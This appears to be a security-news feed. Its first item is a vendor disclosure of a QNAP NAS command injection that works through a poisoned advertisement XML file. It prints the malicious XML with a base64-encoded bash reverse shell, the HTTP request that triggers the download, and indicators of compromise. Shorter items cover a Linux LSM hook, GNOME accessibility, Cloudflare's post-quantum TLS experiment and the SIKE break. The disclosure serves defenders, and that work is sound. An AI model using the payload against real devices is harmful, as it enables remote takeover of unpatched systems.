Neither organization provided a CVSS vector to describe the vulnerability. QNAP’s advisory doesn’t even indicate the vulnerable component. SAM’s disclosure says they found the vulnerability when they “fuzzed” the web server’s CGI scripts (which is not generally the way you discover command injection vulnerabilities, but I digress). SAM published a proof-of-concept video that allegedly demonstrates exploitation of the vulnerability, although it doesn’t appear to be a typical straightforward command injection. The recorded exploit downloads BusyBox to establish a reverse shell, and it appears to make multiple requests to accomplish this. That’s many more moving parts than a typical command injection exploit. Regardless, beyond affected versions, there are essentially no usable details for defenders or attackers in either disclosure.

Given the ridiculous number of internet-facing QNAP NAS devices (350,000+), the seemingly endless ransomware attacks on these systems (Qlocker, Deadbolt, and Checkmate), and the mystery surrounding alleged exploitation in the wild of CVE-2020-2509, we decided to find out exactly what CVE-2020-2509 is. Instead, we found the below, which may be an entirely new vulnerability.

Poisoned XML command injection (CVE-2022-XXXX)



[Video: proof-of-concept exploitation of the command injection]

The video demonstrates exploitation of an unauthenticated and remote command injection vulnerability on a QNAP TS-230 running QTS 4.5.1.1480 (reportedly the last version affected by CVE-2020-2509). We were unable to obtain the first patched version, QTS 4.5.1.1495, but we were able to confirm this vulnerability was patched in QTS 4.5.1.1540. However, we don’t think this is CVE-2020-2509. The exploit in the video requires the attacker be a man-in-the-middle or have performed a DNS hijack of update.qnap.com. In the video, our lab network’s Mikrotik router has a malicious static DNS entry for update.qnap.com.


SAM and QNAP’s disclosures didn’t mention any type of man-in-the-middle or DNS hijack, but neither disclosure ruled it out either. CVSS vectors are great for this sort of thing. If either organization had published a vector with an Attack Complexity of high, we’d know this “new” vulnerability is CVE-2020-2509. If they’d published a vector with an Attack Complexity of low, we’d know this “new” vulnerability is not CVE-2020-2509. The lack of a vector leaves us unsure. Only CISA’s claim of widespread exploitation leads us to believe this is not CVE-2020-2509. However, this “new” vulnerability is still a high-severity issue. It could reasonably be scored as CVSSv3 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). While the issue was patched 15 to 20 months ago (patches for CVE-2020-2509 were released in November 2020 and April 2021), there are still thousands of internet-facing QNAP devices that remain unpatched against this “new” issue. As such, we are going to describe the issue in more detail.

Exploitation and patch

The “new” vulnerability can be broken down into two parts:

  1. A remote and unauthenticated attacker can force a QNAP device to make an HTTP request to update.qnap.com, without using SSL, in order to download an XML file.
  2. Content from the downloaded XML file is passed to a system call without any sanitization.

Both of these issues can be found in QNAP’s web server cgi-bin executable authLogin.cgi, but the behavior is triggered by a request to /cgi-bin/qnapmsg.cgi. Below is decompiled code from authLogin.cgi that highlights the use of HTTP to fetch a file.

[Screenshot: decompiled code from authLogin.cgi fetching the XML over plain HTTP]

Using wget, the QNAP device will download a language-specific XML file such as http://update.qnap.com/loginad/qnapmsg_eng.xml, where eng can be a variety of different values (cze, dan, ger, spa, fre, ita, etc.). When the XML has been downloaded, the device then parses the XML file. When the parser encounters <img> tags, it will attempt to download the associated image using wget.

[Screenshot: decompiled XML parsing and image download logic]

The <img> value is added to a wget command without any type of sanitization, which is a very obvious command injection issue.


The XML, if downloaded straight from QNAP, looks like the following (note that it appears to be part of an advertisement system built into the device):

<?xml version="1.0" encoding="utf-8"?>
<Root>
  <Messages>
    <Message>
      <img>http://update.qnap.com/loginad/image/1_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=822&amp;c=351&amp;sc=513&amp;t=520&amp;n=18168</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/4_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=8685</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/2_eng.jpg</img>
      <link>http://www.facebook.com/QNAPSys</link>
    </Message>
  </Messages>
</Root>

Because of the command injection issue, a malicious attacker can get a reverse shell by providing an XML file that looks like the following. The command injection is performed with backticks, and the actual payload (a bash reverse shell using /dev/tcp) is base64 encoded because / is a disallowed character.

<?xml version="1.0" encoding="utf-8"?>
<Root>
	<Messages>
		<Message>
			<img>/`echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh`</img>
			<link>http://www.qnap.com/></link>
		</Message>
	</Messages>
</Root>

An attacker can force a QNAP device to download the XML file by sending the device an HTTP request similar to http://device_ip/cgi-bin/qnapmsg.cgi?lang=eng. Here, again, eng can be replaced by a variety of languages.

Obviously, the number one challenge to exploit this issue is getting the HTTP requests for update.qnap.com routed to an attacker-controlled system.


Becoming a man-in-the-middle is not easy for a normal attacker. However, APT groups have consistently demonstrated that man-in-the-middle attacks are a part of normal operations. VPNFilter, FLYING PIG, and the Iranian Digator incident are all historical examples of APT attacking (or potentially attacking) via man-in-the-middle. An actor that has control of any router between the QNAP and update.qnap.com can inject the malicious XML we provided above. This, in turn, allows them to execute arbitrary code on the QNAP device.


The other major attack vector is via DNS hijacking. For this vulnerability, the most likely DNS hijack attacks that don’t require a man-in-the-middle position are a router DNS hijack or a third-party DNS server compromise. In the case of a router DNS hijack, the attacker exploits a router and instructs it to tell all connected devices to use a malicious DNS server or malicious static routes (similar to our lab setup). Third-party DNS server compromise is more interesting because of its ability to scale. Both Mandiant and Talos have observed this type of DNS hijack in the wild. When a third-party DNS server is compromised, an attacker is able to introduce malicious entries to the DNS server.


So, while there is some complexity to exploiting this issue, those complications are easily defeated by a moderately skilled attacker — which calls into question why QNAP didn’t issue an advisory and CVE for this issue. Presumably they knew about the vulnerability, because they made two changes to fix it. First, the insecure HTTP request for the XML was changed to a secure HTTPS request. That prevents all but the most advanced attackers from masquerading as update.qnap.com. Additionally, the image download logic was updated to use an execl wrapper called qnap_exec instead of system, which mitigates command injection issues.


Indicators of compromise

This attack does leave indicators of compromise (IOCs) on disk. A smart attacker will clean these up, but they may be worth checking for. The XML files are downloaded to /home/httpd/RSS/rssdoc/. The following is an example of the malicious XML from our proof-of-concept video:

[albinolobster@NAS4A32F3 rssdoc]$ ls -l
total 32
-rw-r--r-- 1 admin administrators     0 2022-07-27 19:57 gen_qnapmsg_eng.xml
drwxrwxrwx 2 admin administrators  4096 2022-07-26 18:39 image/
-rw-r--r-- 1 admin administrators     8 2022-07-27 19:57 last_uptime.qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators   229 2022-07-27 19:57 qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators 18651 2022-07-27 16:02 wget.log
[albinolobster@NAS4A32F3 rssdoc]$ cat qnapmsg_eng.xml 
<?xml version="1.0" encoding="utf-8"?>
<Root>
<Messages>
<Message><img>/`(echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh)&`</img><link>http://www.qnap.com/</link></Message></Messages></Root>

Similarly, an attack can leave an sh process hanging in the background. Search for malicious ones using ps | grep wget. If you see anything like the following, it’s a clear IOC:

[albinolobster@NAS4A32F3 rssdoc]$ ps | grep wget
10109 albinolo    476 S   grep wget
12555 admin      2492 S   sh -c /usr/bin/wget -t 1 -T 5 /`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)` -O /home/httpd/RSS/rssdoc/image/`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)`.tmp 1>>/dev/null 2>>/dev/null

Conclusion

Perhaps what we’ve described here is in part CVE-2020-2509, and that explains the lack of advisory from QNAP. Or maybe it’s one of the many other command injections that QNAP has assigned a CVE but failed to describe, and therefore denied users the chance to make informed choices about their security. It’s impossible to know because QNAP publishes almost no details about any of their vulnerabilities — a practice that might thwart some attackers, but certainly harms defenders trying to identify and monitor these attacks in the wild, as well as defenders who have to help clean up the myriad ransomware cases that are affecting QNAP devices.

SAM did not owe us a good disclosure (which is fortunate, because they didn’t give us one), but QNAP did. SAM was successful in ensuring the issue got fixed, and they held the vendor to a coordinated disclosure deadline (which QNAP subsequently failed to meet). We should all be grateful to SAM: Even if their disclosure wasn’t necessarily what we wanted, we all benefited from their work. It’s QNAP that owes us, the customers and security industry, good disclosures. Vendors who are responsible for the security of their products are also responsible for informing the community of the seriousness of vulnerabilities that affect those products. When they fail to do this — for example by failing to provide advisories with basic descriptions, affected components, and industry-standard metrics like CVSS — they deny their current and future users full autonomy over the choices they make about risk to their networks. This makes us all less secure.

Disclosure timeline

  • July, 2022: Researched and discovered by Jake Baines of Rapid7
  • Thu, Jul 28, 2022: Disclosed to QNAP, seeking a CVE ID
  • Sun, Jul 31, 2022: Automated response from the vendor indicating they have moved to a new support ticket system and that tickets should be filed there. The link to the new ticketing system merely sends Rapid7 to QNAP’s home page.
  • Tue, Aug 2, 2022: Rapid7 informs QNAP via email that their support link is broken and Rapid7 will publish this blog on August 4, 2022.
  • Tue, Aug 2, 2022: QNAP responds directing Rapid7 to the advisory for CVE-2020-2509.
  • Thu, Aug 4, 2022: This public disclosure


[$] A security-module hook for user-namespace creation

Post Syndicated from original https://lwn.net/Articles/903580/

The Linux Security Module (LSM) subsystem works by way of an extensive set of hooks placed strategically throughout the kernel. Any specific security module can attach to the hooks for the behavior it intends to govern and be consulted whenever a decision needs to be made. The placement of LSM hooks often comes with a bit of controversy; developers have been known to object to the performance cost of hooks in hot code paths, and sometimes there are misunderstandings over how integration with LSMs should be handled. The disagreement over a security hook for the creation of user namespaces, though, is based on a different sort of concern.

Mena Quintero: Paying technical debt in our accessibility infrastructure

Post Syndicated from original https://lwn.net/Articles/903822/

On his blog, Federico Mena Quintero posted a transcript of his recent talk at GUADEC 2022 on the technical debt in the GNOME accessibility infrastructure—and what he has been doing to help pay that down. He began the talk by describing the infrastructure and how it came about:

Gnome-shell implements its own toolkit, St, which stands for “shell toolkit”. It is made accessible by implementing the GObject interfaces in atk. To make a toolkit accessible means adding a way to extract information from it in a standard way; you don’t want screen readers to have separate implementations for GTK, Qt, St, Firefox, etc. For every window, regardless of toolkit, you want to have a “list children” method. For every widget you want “get accessible name”, so for a button it may tell you “OK button”, and for an image it may tell you “thumbnail of file.jpg”. For widgets that you can interact with, you want “list actions” and “run action X”, so a button may present an “activate” action, and a check button may present a “toggle” action.

However, ATK is just abstract interfaces for the benefit of toolkits. We need a way to ship the information extracted from toolkits to assistive tech like screen readers. The atspi protocol is a set of DBus interfaces that an application must implement; atk-adaptor is an implementation of those DBus interfaces that works by calling atk’s slightly different interfaces, which in turn are implemented by toolkits. Atk-adaptor also caches some things that it already asked to the toolkit, so it doesn’t have to ask again unless the toolkit notifies about a change.

Does this seem like too much translation going on? It is! We will see the reasons behind that when we talk about how accessibility was implemented many years ago in GNOME.

Security updates for Thursday

Post Syndicated from original https://lwn.net/Articles/903816/

Security updates have been issued by Fedora (lua), Oracle (kernel), Red Hat (389-ds:1.4, django, firefox, go-toolset and golang, go-toolset-1.17 and go-toolset-1.17-golang, go-toolset:rhel8, java-1.8.0-ibm, java-17-openjdk, kernel, kernel-rt, kpatch-patch, mariadb:10.5, openssl, pcre2, php, rh-mariadb105-galera and rh-mariadb105-mariadb, ruby:2.5, thunderbird, vim, and virt:rhel and virt-devel:rhel), Scientific Linux (firefox and thunderbird), SUSE (drbd, java-17-openjdk, java-1_8_0-ibm, keylime, ldb, samba, mokutil, oracleasm, pcre2, permissions, postgresql-jdbc, python-numpy, samba, tiff, u-boot, and xscreensaver), and Ubuntu (nvidia-graphics-drivers-390, nvidia-graphics-drivers-450-server, nvidia-graphics-drivers-470, nvidia-graphics-drivers-470-server, nvidia-graphics-drivers-510, nvidia-graphics-drivers-510-server, nvidia-graphics-drivers-515, nvidia-graphics-drivers-515-server).

Experiment with post-quantum cryptography today

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/experiment-with-pq/


Practically all data sent over the Internet today is at risk in the future if a sufficiently large and stable quantum computer is created. Anyone who captures that data now could decrypt it then.

Luckily, there is a solution: we can switch to so-called post-quantum (PQ) cryptography, which is designed to be secure against attacks of quantum computers. After a six-year worldwide selection process, in July 2022, NIST announced they will standardize Kyber, a post-quantum key agreement scheme. The standard will be ready in 2024, but we want to help drive the adoption of post-quantum cryptography.

Today we have added support for the X25519Kyber512Draft00 and X25519Kyber768Draft00 hybrid post-quantum key agreements to a number of test domains, including pq.cloudflareresearch.com.

Do you want to experiment with post-quantum on your test website for free? Mail [email protected] to enroll your test website, but read the fine-print below.

What does it mean to enable post-quantum on your website?

If you enroll your website to the post-quantum beta, we will add support for these two extra key agreements alongside the existing classical encryption schemes such as X25519. If your browser doesn’t support these post-quantum key agreements (and none at the time of writing do), then your browser will continue working with a classically secure, but not quantum-resistant, connection.

Then how to test it?

We have open-sourced a fork of BoringSSL and Go that has support for these post-quantum key agreements. With those and an enrolled test domain, you can check how your application performs with post-quantum key exchanges. We are working on support for more libraries and languages.

What to look for?

Kyber and classical key agreements such as X25519 have different performance characteristics: Kyber requires less computation, but it has bigger keys and uses a bit more RAM. It could very well make the connection faster if used on its own.

We are not using Kyber on its own though, but are using hybrids. That means we are doing both an X25519 and Kyber key agreement such that the connection is still classically secure if either is broken. That also means that connections will be a bit slower. In our experiments, the difference is very small, but it’s best to check for yourself.

The fine-print

Cloudflare’s post-quantum cryptography support is a beta service for experimental use only. Enabling post-quantum on your website will subject the website to Cloudflare’s Beta Services terms and will impact other Cloudflare services on the website as described below.

No stability or support guarantees

Over the coming months, both Kyber and the way it’s integrated into TLS will change for several reasons, including:

  1. Kyber will see small, but backward-incompatible changes in the coming months.
  2. We want to be compatible with other early adopters and will change our integration accordingly.
  3. As, together with the cryptography community, we find issues, we will add workarounds in our integration.

We will update our forks accordingly, but cannot guarantee any long-term stability or continued support. PQ support may become unavailable at any moment. We will post updates on pq.cloudflareresearch.com.

Features in enrolled domains

For the moment, we are running enrolled zones on a slightly different infrastructure for which not all features, notably QUIC, are available.

With that out of the way, it’s…

Demo time!

BoringSSL

The following commands build our fork of BoringSSL and create a TLS connection with pq.cloudflareresearch.com using the compiled bssl tool. Note that we do not enable the post-quantum key agreements by default, so you have to pass the -curves flag.

$ git clone https://github.com/cloudflare/boringssl-pq
[snip]
$ cd boringssl-pq && mkdir build && cd build && cmake .. -Gninja && ninja 
[snip]
$ ./tool/bssl client -connect pq.cloudflareresearch.com -server-name pq.cloudflareresearch.com -curves Xyber512D00
	Connecting to [2606:4700:7::a29f:8a55]:443
Connected.
  Version: TLSv1.3
  Resumed session: no
  Cipher: TLS_AES_128_GCM_SHA256
  ECDHE curve: X25519Kyber512Draft00
  Signature algorithm: ecdsa_secp256r1_sha256
  Secure renegotiation: yes
  Extended master secret: yes
  Next protocol negotiated: 
  ALPN protocol: 
  OCSP staple: no
  SCT list: no
  Early data: no
  Encrypted ClientHello: no
  Cert subject: CN = *.pq.cloudflareresearch.com
  Cert issuer: C = US, O = Let's Encrypt, CN = E1

Go

Our Go fork doesn’t enable the post-quantum key agreement by default. The following simple Go program enables PQ by default for the http package and GETs pq.cloudflareresearch.com.

package main

import (
  "crypto/tls"
  "fmt"
  "net/http"
)

func main() {
  http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{
    CurvePreferences: []tls.CurveID{tls.X25519Kyber512Draft00, tls.X25519},
    CFEventHandler: func(ev tls.CFEvent) {
      switch e := ev.(type) {
      case tls.CFEventTLS13HRR:
        fmt.Printf("HelloRetryRequest\n")
      case tls.CFEventTLS13NegotiatedKEX:
        switch e.KEX {
        case tls.X25519Kyber512Draft00:
          fmt.Printf("Used X25519Kyber512Draft00\n")
        default:
          fmt.Printf("Used %d\n", e.KEX)
        }
      }
    },
  }

  if _, err := http.Get("https://pq.cloudflareresearch.com"); err != nil {
    fmt.Println(err)
  }
}

To run we need to compile our Go fork:

$ git clone https://github.com/cloudflare/go
[snip]
$ cd go/src && ./all.bash
[snip]
$ ../bin/go run path/to/example.go
Used X25519Kyber512Draft00

On the wire

So what does this look like on the wire? With Wireshark we can capture the packet flow. First a non-post quantum HTTP/2 connection with X25519:

[Wireshark capture: TLS 1.3 handshake with a classical X25519 key share]

This is a normal TLS 1.3 handshake: the client sends a ClientHello with an X25519 keyshare, which fits in a single packet. In return, the server sends its own 32 byte X25519 keyshare. It also sends various other messages, such as the certificate chain, which requires two packets in total.

Let’s check out Kyber:

[Wireshark capture: TLS 1.3 handshake with the hybrid X25519Kyber512Draft00 key share]

As you can see the ClientHello is a bit bigger, but still fits within a single packet. The response takes three packets now, instead of two, because of the larger server keyshare.

Under the hood

Want to add client support yourself? We are using a hybrid of X25519 and Kyber version 3.02. We are writing out the details of the latter in version 00 of this CFRG IETF draft, hence the name. We are using TLS group identifiers 0xfe30 and 0xfe31 for X25519Kyber512Draft00 and X25519Kyber768Draft00 respectively.

There are some differences between our Go and BoringSSL forks that are interesting to compare.

  • Our Go fork uses our fast AVX2-optimized implementation of Kyber from CIRCL. In contrast, our BoringSSL fork uses the simpler portable reference implementation. Without the AVX2 optimizations it’s easier to evaluate; the downside is that it’s slower. Don’t be mistaken: it is still very fast, but you can check for yourself.
  • Our Go fork only sends one keyshare. If the server doesn’t support it, it will respond with a HelloRetryRequest message and the client will fall back to one the server does support. This adds a roundtrip.
    Our BoringSSL fork, on the other hand, will send two keyshares: the post-quantum hybrid and a classical one (if a classical key agreement is still enabled). If the server doesn’t recognize the first, it will be able to use the second. In this way we avoid a roundtrip if the server does not support the post-quantum key agreement.

Looking ahead

The quantum future is here. In the coming years the Internet will move to post-quantum cryptography. Today we are offering our customers the tools to get a head start and test post-quantum key agreements. We’d love to hear your feedback: email it to [email protected].

This is just a small, but important first step. We will continue our efforts to move towards a secure and private quantum-secure Internet. Much more to come — watch this space.

SIKE Broken

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/sike-broken.html

SIKE is one of the new algorithms that NIST recently added to the post-quantum cryptography competition.

It was just broken, really badly.

We present an efficient key recovery attack on the Supersingular Isogeny Diffie­-Hellman protocol (SIDH), based on a “glue-and-split” theorem due to Kani. Our attack exploits the existence of a small non-scalar endomorphism on the starting curve, and it also relies on the auxiliary torsion point information that Alice and Bob share during the protocol. Our Magma implementation breaks the instantiation SIKEp434, which aims at security level 1 of the Post-Quantum Cryptography standardization process currently ran by NIST, in about one hour on a single core.

News article.
